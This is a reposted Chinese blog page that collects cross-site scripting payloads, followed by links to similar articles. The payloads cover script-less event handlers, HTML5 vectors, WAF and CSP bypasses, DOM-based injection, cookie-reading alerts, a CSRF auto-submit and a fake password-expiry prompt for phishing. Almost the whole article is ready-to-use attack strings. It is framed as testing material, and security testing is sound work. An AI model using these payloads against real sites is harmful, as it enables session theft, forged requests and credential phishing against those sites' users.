XSS测试代码

最新推荐文章于 2024-08-18 00:48:01 发布
最新推荐文章于 2024-08-18 00:48:01 发布
阅读量355 收藏
点赞数
文章标签: javascript php xhtml ViewUI
原文链接:http://www.cnblogs.com/ssooking/p/6542333.html
版权

 无script的Xss

<img/src=# οnerrοr=alert('XSS')>

 

HTML5  XSS测试代码

<video> <source οnerrοr=”javascript:alert(1)”>

引入媒体类测试代码Example:
<video οnerrοr=”javascript:alert(1)”><source>
<audio οnerrοr=”javascript:alert(1)”><source>

<input autofocus οnfοcus=alert(1)>
<select autofocus οnfοcus=alert(1)>
<textarea autofocus οnfοcus=alert(1)>
<keygen autofocus οnfοcus=alert(1)>

表单点击测试代码Example:
<button form=test onformchange=alert(2)>X
<form><button formaction=”javascript:alert(1)”>

 

ByPass

text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

<base href="javascript:\"> <a href="//%0aalert(/1/);//">link</a>

javascript:/*--></title></style></textarea></script></xmp><svg/οnlοad='+/"/+/οnmοuseοver=1/+/[*/[]/+alert(1)//'>

 

 

 CSP & WAF Bypass

<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>

<svg </onload ="1> (_=alert,_(1337)) "">

<img οnerrοr=alert(1) src <u></u>

 

 

重定向 攻击代码:

';redirecturl='javascript:alert("XSS")
';redirecturl='http://google.com/'

 

Example: www.xyz.com?q="XSS Script"

   

 "/>alert("Xss:Priyanshu")
    "/></script><script>alert(/XSS : Priyanshu/)</script>

<body οnlοad=alert(1)>
"<body οnlοad="alert('XSS by Priyanshu')">

"><%2Fstyle<%2Fscript><script>confirm("XSS By Priyanshu")<%2Fscript>

<body οnlοad=document.getElementById("xsrf").submit()>

<a href="data:text/html;based64_,<svg/οnlοad=\u0061&#x6c;&101%72t(1)>">X</a

<a href="data:text/html;based64_,<svg/οnlοad=\u0061&#x6c;&101%72t(document.cookie)>">X</a

    http://test.com<script>alert(document.domain)</script>
    http://test.com<script>alert(document.cookie)</script>

<img src=x οnerrοr=alert(document.domain)>

x"></script><img src=x οnerrοr=alert(1)>

q=" οnclick="alert(/XSS/)

"><iframe src='javascript:prompt(/XSS/);'>

<iframe src="http://google.com"></iframe>

"><iframe src=a οnlοad=alert('XSS')<

</script><script>alert(document.cookie)</script>

<xss>alert('xss')</xss>

<iframe src="http://google.com"></iframe>

DOM Based XSS Scripts

    /default.aspx#"><img src=x οnerrοr=prompt('XSS');>
    /default.aspx#"><img src=x οnerrοr=prompt('0');>

<img src=x οnerrοr=prompt(1);> by ">
><img src=x οnerrοr=prompt(0)>.txt.jpg

“><img src=x οnerrοr=alert(document.cookie)>

"><img src=x οnerrοr=prompt(1);>

"><script>alert('XSS')</script>

id=abc"><Script>alert(/xss/)</SCRIPT>

"><img src=" " onMouseover=prompt(/xss/);>

Default.aspx/" οnmοuseοut="confirm(1)'x="

 

 

欺骗会话

http://localhost/test.php?title=TITLE</title><script>var a = prompt('密码已经过期,请重新输入密码');alert(a);</script>

 

转载于:https://www.cnblogs.com/ssooking/p/6542333.html

abg49988
关注
xss测试代码大全javascript中的xss过滤
03-24
xss测试代码大全
XSS测试代码大全
夕慕慕的博客
11-14 1万+
XSS测试代码大全 主要根据各种脚本及标签,将之转换成Unicode编码后输入。 '>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E alert('XSS') %0a
xss跨站脚本攻击
最新发布
qq_64951792的博客
08-18 1004
xss攻击
Web安全:XSS漏洞的测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
03-17 1万+
XSS漏洞的概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
xss测试代码
11-16 201
1.标准的xss漏洞测试代码<script>alert('xss')</script>2.img图片标记属性跨站攻击代码<img src="javascript:alert(/xss/)"></img><img dynsrc="javascript:alert('xss')">3.无需"<>",利用html标记事件属...
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
XSS漏洞 DOM型测试 payload代码
02-26
XSS漏洞 DOM型测试 payload代码 这是测试跨脚本攻击是否有DOM型XSS的漏洞,适合网络安全初学者进行测试。 跨脚本攻击漏洞是top10的一种。
jquery xss验证代码
08-13
jquery xss验证代码,以txt打开,修改http://xxx/jquery.js,保存后加载有问题的jquery,可以出现弹窗
XSS(五) xss检测与利用
shirlly_的博客
04-13 172
xss检测工具
测试xss的方法
一个坏坏的程序员
08-04 770
测试xss的方法
XSS 跨站测试代码大全2
LIVE
11-07 1332
0x01 XSS介绍 1. XSS分类 (1) 反射型XSS、 (2)存储型XSS、 (3)Dom型XSS、 (4) 通用型XSS、(全称Universal Cross-Site Scripting,翻译过来就是通用型XSS 简称UXSS) (5) 突变型XSS ( 介绍: mXS()突变 XSS) 是当不可信数据在 DOM 的 innerHTML 属性的上下文被处理并通过浏览器发生突变,...
XSS跨站测试代码大全
xysoul的专栏
04-13 6314
'>alert(document.cookie)   ='>alert(document.cookie)   alert(document.cookie)   alert(vulnerable)   %3Cscript%3Ealert('XSS')%3C/script%3E   alert('XSS')      %0a%0aalert(\"Vulnerable\").jsp
安全测试之xss攻击通用测试用例
测试开发
04-12 901
安全测试,测xss攻击,一个通用case测出一类问题。测试开发同学可以关注一下
渗透测试[xss脚本攻击]
npc88888的博客
03-07 1295
相反,攻击者利用前端JavaScript代码中的漏洞,直接在用户的浏览器中修改网页的DOM结构,导致恶意脚本被执行。举个例子,假设一个网页上有一个搜索框,用户在搜索框中输入内容后,网页会通过JavaScript代码将用户的输入显示在页面上。如果网页没有对用户输入进行适当的验证和转义处理,那么攻击者可以构造一个恶意输入,其中包含恶意脚本,比如。在网站是否存在 xss 漏洞时,应该输入一些标签如输入后查看网页源代码是 否过滤标签,如果没过滤,很大可能存在 xss 漏洞。登录后台,就会执行这个代码。
XSS 攻击常用代码
高压锅博客
12-22 7435
【代码】XSS 攻击常用代码。
XSS测试
qq_52016943的博客
07-28 1565
XSS 绕过
XSS(跨站脚本攻击) - 常用代码大全
热门推荐
CHK的博客
08-20 5万+
XSS(跨站脚本攻击) - 常用代码大全: 1'"()&amp;%&lt;acx&gt;&lt;ScRiPt &gt;prompt(915149)&lt;/ScRiPt&gt; &lt;svg/onload=alert(1)&gt; &lt;script&gt;alert(document.cookie)&lt;/script&gt; '&gt;&lt;script&a
XSS测试代码大全:全面探索Web安全漏洞示例
这篇文档提供了一组XSS测试代码大全,用于帮助开发者和安全测试人员识别和验证网站是否存在XSS漏洞。这些代码示例包括: 1. 使用HTML实体编码的JavaScript注入,如`'%3Cscript%3Ealert('XSS')%3C/script%3E'`,它将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值